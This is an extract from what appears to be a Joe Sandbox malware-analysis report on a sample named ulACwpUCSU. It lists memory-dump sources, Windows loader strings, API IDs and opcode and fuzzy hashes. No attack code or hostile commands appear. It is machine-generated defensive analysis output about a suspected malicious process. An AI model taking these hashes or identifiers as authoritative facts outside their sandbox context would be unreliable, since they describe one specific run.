                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 377785DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 42ee7c42e4f321d3516d9da198926f9644b69e3cfb6ef1e10a1d4de47f2a8d51
                                          • Instruction ID: 37a747a9b9e52832dc62f8121518b3131e9e0e63d3b2b295a2c7cb05daa4d9df
                                          • Opcode Fuzzy Hash: 42ee7c42e4f321d3516d9da198926f9644b69e3cfb6ef1e10a1d4de47f2a8d51
                                          • Instruction Fuzzy Hash: 8131D035301B06BFE7419B24C960B9AFBA6FF48764F001119E9119BA61DB75EC21CF81
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 1d889e889c69fc0fcf439eece85650dd57e4a6a6e92e9ff91822a0b15dacf7c4
                                          • Instruction ID: 3d98146d327c40449c435acc621e6e616bcd3271484e5cddd3daa8c9875d80f0
                                          • Opcode Fuzzy Hash: 1d889e889c69fc0fcf439eece85650dd57e4a6a6e92e9ff91822a0b15dacf7c4
                                          • Instruction Fuzzy Hash: 1311E772B142A5AFEF058B5CC985A7EB7BAEF48260F11017DE405EB350DA749D01CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$AddD
                                          • API String ID: 0-2525844869
                                          • Opcode ID: 064b6156d0ac51f543a71f3a39b8090e563de06f3b2305ba7dc2a8e2f668fafe
                                          • Instruction ID: 158ea9430bc42f89c9b1fd986edbe7bbe600571fc0af5cc67781fa0886d27c2b
                                          • Opcode Fuzzy Hash: 064b6156d0ac51f543a71f3a39b8090e563de06f3b2305ba7dc2a8e2f668fafe
                                          • Instruction Fuzzy Hash: 4FA16D76508384AFE715CB14C845BBBB7EAFFC4714F504A2EF9948A250E770E905CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 933d98d7149b8b976cceb267e59d3640bbf7fd08a5b9e5a4a2c5af0ecd599435
                                          • Instruction ID: ae600ef62524cc28cfe344a0787437ca6b4992627d96e9bcb5a68e83dcf7a1da
                                          • Opcode Fuzzy Hash: 933d98d7149b8b976cceb267e59d3640bbf7fd08a5b9e5a4a2c5af0ecd599435
                                          • Instruction Fuzzy Hash: 6B615DB1A103099FDB15CFA8C844BADBBB5FB44754F50442EE949EF256EB70E900CB60
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 377CB5C4
                                          • RedirectedKey, xrefs: 377CB60E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                          • API String ID: 0-1388552009
                                          • Opcode ID: 1630c9d8fb179a4b9aa426335ffefe5fd49e507a8932d523faad3884853582d3
                                          • Instruction ID: 5abd1d16b4631bd060daba5f63fbcc777191fd9f0ab55bbe3193f8bd24134f5b
                                          • Opcode Fuzzy Hash: 1630c9d8fb179a4b9aa426335ffefe5fd49e507a8932d523faad3884853582d3
                                          • Instruction Fuzzy Hash: 5B61F3B5C4021AEBDF11CF94C989ADEBBB9FF48714F50406AF805AB210D7349A46DFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$
                                          • API String ID: 3446177414-233714265
                                          • Opcode ID: a2f7a6a276f64ab8b613a4f4f1c7913a470a1338dd2a5a5c7d3fbf3ee7776371
                                          • Instruction ID: ff7922563d2006748604c307e25298e3c9cca7ddd00954d306c70727f82e70ec
                                          • Opcode Fuzzy Hash: a2f7a6a276f64ab8b613a4f4f1c7913a470a1338dd2a5a5c7d3fbf3ee7776371
                                          • Instruction Fuzzy Hash: 3061BC75A00749CFEB20CFA4C588BADB7F2BF44714F504469E115AF690CB79A942CF92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                          • API String ID: 0-118005554
                                          • Opcode ID: e40ecd6209523e9299839f34d83fbeb688b975f7b694737961b6180109fc2f68
                                          • Instruction ID: cda962ba250c5452da84ead467f21155fcabb4bdc49f3cb9cdd2415f90df83ab
                                          • Opcode Fuzzy Hash: e40ecd6209523e9299839f34d83fbeb688b975f7b694737961b6180109fc2f68
                                          • Instruction Fuzzy Hash: D731EF75209741ABE301CF68D855B2AB7E5EF89B20F000C69F858CF391EB74E905CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: n7$ n7
                                          • API String ID: 0-2002223982
                                          • Opcode ID: b06c393daf1f9582c2204e7cecc9b42699eec03cedfd3ab1ddcb1c5624178e99
                                          • Instruction ID: e45c260aa124cdd6ab2ed8a93eae9496f3737763874ab4a1d7d79b103453c4d4
                                          • Opcode Fuzzy Hash: b06c393daf1f9582c2204e7cecc9b42699eec03cedfd3ab1ddcb1c5624178e99
                                          • Instruction Fuzzy Hash: 1431F536604B099BD711DE24C8A0E7BB7EAEFC46A0F0145A9FC159B310EB35DC158FA2
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3776289F
                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3776289A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                          • API String ID: 0-2653619699
                                          • Opcode ID: 13b226e3c0180edffaf2abb3ce81d2be8a3ba0093b42ff5949d9f816bf0c9e06
                                          • Instruction ID: 3a2bf556ec81b744f4d82e4d872e08b4e6bc29ac21536f2bfc86a0cd638acdf1
                                          • Opcode Fuzzy Hash: 13b226e3c0180edffaf2abb3ce81d2be8a3ba0093b42ff5949d9f816bf0c9e06
                                          • Instruction Fuzzy Hash: 6B1129B2B04305BFE7158A48CC45F6B76A9DB88B64F60847EFD04EF244DA78DD0096A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: 4fb5ff62f723e55793be282f2fc7648ae6c40ffc52df1155a7765998d179c275
                                          • Instruction ID: 28603bac31ac96e0e793ce281753b5b925f3f4f4c0193e9a75ea9c06e2ee409a
                                          • Opcode Fuzzy Hash: 4fb5ff62f723e55793be282f2fc7648ae6c40ffc52df1155a7765998d179c275
                                          • Instruction Fuzzy Hash: 6601D1B2260740AFE311CF24CD45B1277F8EB40B19F018979F968CB991E738E914DB46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: ab3314c0d7202f72601dd1029335dca8b11d48a457ef8ed23853c50d10bc47b5
                                          • Instruction ID: ae9cc72a742e54290cb497e974b637b65b717b3f50d04a909b10148d34abc27b
                                          • Opcode Fuzzy Hash: ab3314c0d7202f72601dd1029335dca8b11d48a457ef8ed23853c50d10bc47b5
                                          • Instruction Fuzzy Hash: 14826C79E003098FEB14CFA9C8A0BADB7B1FF49360F108169D819AB251DB36AD45CF51
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd173c36fbb799b5fab263736421dd65c60e27c037517bd45252c39f81efdad8
                                          • Instruction ID: f100d6b08841c93bf0c5b8d05270ab18ae4d0fd2e6b5db8c4dde101ca558a1c1
                                          • Opcode Fuzzy Hash: cd173c36fbb799b5fab263736421dd65c60e27c037517bd45252c39f81efdad8
                                          • Instruction Fuzzy Hash: 24E16975609341CFD704CF28C4A0B5ABBF1BF89364F048A6DE8999B351DB32E905CB92
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 668a328ee5aeff8867c8413f5b0f284c8e8776322d2e6aca2d5eda6af852007b
                                          • Instruction ID: 8d176987a22d9a1068a19b2aa3dfe3ce92842fadb75b612ddb8db14538f8ac0e
                                          • Opcode Fuzzy Hash: 668a328ee5aeff8867c8413f5b0f284c8e8776322d2e6aca2d5eda6af852007b
                                          • Instruction Fuzzy Hash: B5A1F571E10714EFEB11CBA4C848BAE77A6AF05778F010525E910BF290DBB8A945CBC2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87ca8f37e5510d4672a7f5399898777eb79257c8e09f17eb7fd440cde666cdc4
                                          • Instruction ID: 2e8cb15b47cf3197e9b7cbb252069ab61eb8f586ed324505903b17e83855b6f7
                                          • Opcode Fuzzy Hash: 87ca8f37e5510d4672a7f5399898777eb79257c8e09f17eb7fd440cde666cdc4
                                          • Instruction Fuzzy Hash: 8F815E75A00345ABEB11DFA5CC84EAFBBF8EF48760F100529E515AF291DB74EA00DB91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 669cd55b0248ae5eb228f0ff7dace6160129649eea9bc51904467db7f4bd8aed
                                          • Instruction ID: 270bcad994e85ae5050138bacfe1bbda0b20bc4f9e389c3f5298241bf3332f0d
                                          • Opcode Fuzzy Hash: 669cd55b0248ae5eb228f0ff7dace6160129649eea9bc51904467db7f4bd8aed
                                          • Instruction Fuzzy Hash: F8416AB5501704CFD725CF24C960B5DB7F6BF45364F1486AAD006AB6A0EB36A941CF42
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: de42b70a28e06c36d889a7de9797e6e9d4678fcdeec7dcbd43a6dbf630e7a48a
                                          • Instruction ID: 2d549b8af95d3147ba53c575e5aeca59bf77b671c9a79d629cdc344cf4f81759
                                          • Opcode Fuzzy Hash: de42b70a28e06c36d889a7de9797e6e9d4678fcdeec7dcbd43a6dbf630e7a48a
                                          • Instruction Fuzzy Hash: 1041F5756183418FD714CF28C8A4B2ABFE9FF81364F10442DE5518B6A1DB36E951CB92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 0c41dcc6596f678521fbf24370488e2562abc5018db3472185a161f3e5967a76
                                          • Instruction ID: 493a8344a45039d302c988ef9b63edecc883da4cd286c9e1c7d82cca0980277f
                                          • Opcode Fuzzy Hash: 0c41dcc6596f678521fbf24370488e2562abc5018db3472185a161f3e5967a76
                                          • Instruction Fuzzy Hash: C9312F72102208DFC711CF24C990E6A77A9EF44364F10426DE9089F6A5CB31ED06CFE2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 8f70dd97287bbd23843a3fa81729b16262f9f152ea03660321681d30777adf6a
                                          • Instruction ID: e5de4011bb75c6c8de508c1fd277f9db26c159edf6f1ffdabdad0ea965e31ebf
                                          • Opcode Fuzzy Hash: 8f70dd97287bbd23843a3fa81729b16262f9f152ea03660321681d30777adf6a
                                          • Instruction Fuzzy Hash: CC31A135715A05FFE7458B24CA60B5ABBA6FF88364F405059E8018BE51CB36ED30CF81
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 3edc633d79d86e18ac9881ba8880d89e23f77555f82a68d159429e5a3b881cd6
                                          • Instruction ID: 1cba17cd8b7265fa285543120e04765c0ec0f7fcae9c695e4ea599cef1703332
                                          • Opcode Fuzzy Hash: 3edc633d79d86e18ac9881ba8880d89e23f77555f82a68d159429e5a3b881cd6
                                          • Instruction Fuzzy Hash: 8631ADB65153418FC710CF19D44499ABBE6FF8A264F4499BEE4889F211D330DD05CF92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: e3f3327dd6ebe826caf02ba4788db52bf792adc51ef8ef6ba597d9568af22faa
                                          • Instruction ID: ac21ce551d03ea2140a3c6a6dad523168a39882dc182b8d1c243f5ea9fc4fe8a
                                          • Opcode Fuzzy Hash: e3f3327dd6ebe826caf02ba4788db52bf792adc51ef8ef6ba597d9568af22faa
                                          • Instruction Fuzzy Hash: 332101362056009FDB219F26CA54B1ABBE4FFC8B20F410469E8415FA40CB76EC88CF93
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: #%u
                                          • API String ID: 0-232158463
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: 0h~7
                                          • API String ID: 0-2661960786
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: n7
                                          • API String ID: 0-3619562546
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: verifier.dll
                                          • API String ID: 0-3265496382
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: Flst
                                          • API String ID: 0-2374792617
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                          • Instruction Fuzzy Hash: 7EB13135700749AFEB15CBA5C890BAEBBF6AF85324F100968E651DF381DB34E941CB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd9db6fe542005285329b54fb377be878d52a634ce022fda5d70a6cba8e974ae
                                          • Instruction ID: 3e1ce24562295dd91570e2569a99751226dde82727c40d7eacb7452077e0f72c
                                          • Opcode Fuzzy Hash: fd9db6fe542005285329b54fb377be878d52a634ce022fda5d70a6cba8e974ae
                                          • Instruction Fuzzy Hash: B2C157742083818FE360CF14C494BABB7E5FF88354F4049ADE9998B290E775E908CF92
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 999a2309643fed77603ba5c1e8de6d20fb9c064ebbccbff046d7ef2de8063e53
                                          • Instruction ID: cd748a97dfa9abac63636b72e2c737a794e546f19ea06bc0e567720bb81ea227
                                          • Opcode Fuzzy Hash: 999a2309643fed77603ba5c1e8de6d20fb9c064ebbccbff046d7ef2de8063e53
                                          • Instruction Fuzzy Hash: E3B18274A002658BEB64CF64C990BB9B3F6EF44750F4085EAD40AEB680EB34DD85CF65
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3b3e255e61b33ebc3eaf40c847ea35fcf9721ff2c87e9770b589cfb36e670b3
                                          • Instruction ID: 9f870cea4cc8ad6bf4a40c3124e7b3c0deb9231fd8188b7b50e430a441349637
                                          • Opcode Fuzzy Hash: f3b3e255e61b33ebc3eaf40c847ea35fcf9721ff2c87e9770b589cfb36e670b3
                                          • Instruction Fuzzy Hash: 70910476A107148BE710AB68C484B7EB7F2EF84B64F51446AF804DF380DB78A941CF92
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d4e859d7a4026fa43002fce5abae836c8ab95ae30949d28641d9c7882bae283
                                          • Instruction ID: 61c76de6595c1d55a52928c84b35c9d6e0729d9a654791490b6f15eea983e670
                                          • Opcode Fuzzy Hash: 1d4e859d7a4026fa43002fce5abae836c8ab95ae30949d28641d9c7882bae283
                                          • Instruction Fuzzy Hash: 1AB170B8A00305CFDF14EF28C490BA977B1BF18368F544559E821DB6A1DB36D846CF91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
